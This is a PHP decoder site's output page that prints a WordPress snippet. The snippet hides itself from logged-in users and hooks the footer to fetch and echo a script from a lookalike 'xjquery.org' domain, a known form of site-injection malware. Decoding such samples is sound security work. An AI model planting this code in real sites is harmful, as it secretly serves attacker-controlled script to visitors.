Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if(!function_exists('wp_func_jquery')) { if (!current_user_can( 'read' )) { function ..
Decoded Output download
<? if(!function_exists('wp_func_jquery')) {
if (!current_user_can( 'read' )) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'x'.'jquery.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
}
?>
Did this file decode correctly?
Original Code
if(!function_exists('wp_func_jquery')) {
if (!current_user_can( 'read' )) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'x'.'jquery.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
}
Function Calls
| function_exists | 1 |
| current_user_can | 1 |
Stats
| MD5 | 156134dfa2468b7d4effcace85574b85 |
| Eval Count | 0 |
| Decode Time | 136 ms |